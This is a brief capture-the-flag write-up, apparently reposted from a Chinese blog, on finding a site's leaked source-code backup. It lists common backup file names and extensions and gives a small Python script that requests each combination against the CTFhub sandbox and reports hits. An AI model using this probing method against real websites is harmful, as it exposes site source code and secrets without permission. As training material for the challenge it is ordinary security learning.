CTFhub 獲取網站原始碼
阿新 • • 發佈:2020-12-07
技術標籤:CTF
常見的網站原始碼備份檔案字尾
tar
tar.gz
zip
rar
常見的網站原始碼備份檔名
web
website
backup
back
www
wwwroot
temp
7k掃描查到是www.zip ,下載發現flag檔案,訪問即可得到
http://challenge-9936840b90db7048.sandbox.ctfhub.com:10080/flag_288466972.txt
也可以自己寫python指令碼生成一下字典
通過獲取響應狀態碼判斷
#!usr/bin/env python
#_*_ coding:utf-8 _*_
import requests
url= "http://challenge-9936840b90db7048.sandbox.ctfhub.com:10080/"
list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
list2=['tar', 'tar.gz', 'zip', 'rar']
for i in list1:
for j in list2:
url_f=url+i+"."+j
r=requests.get(url_f)
if(r.status_code == 200 ):
print(url_f)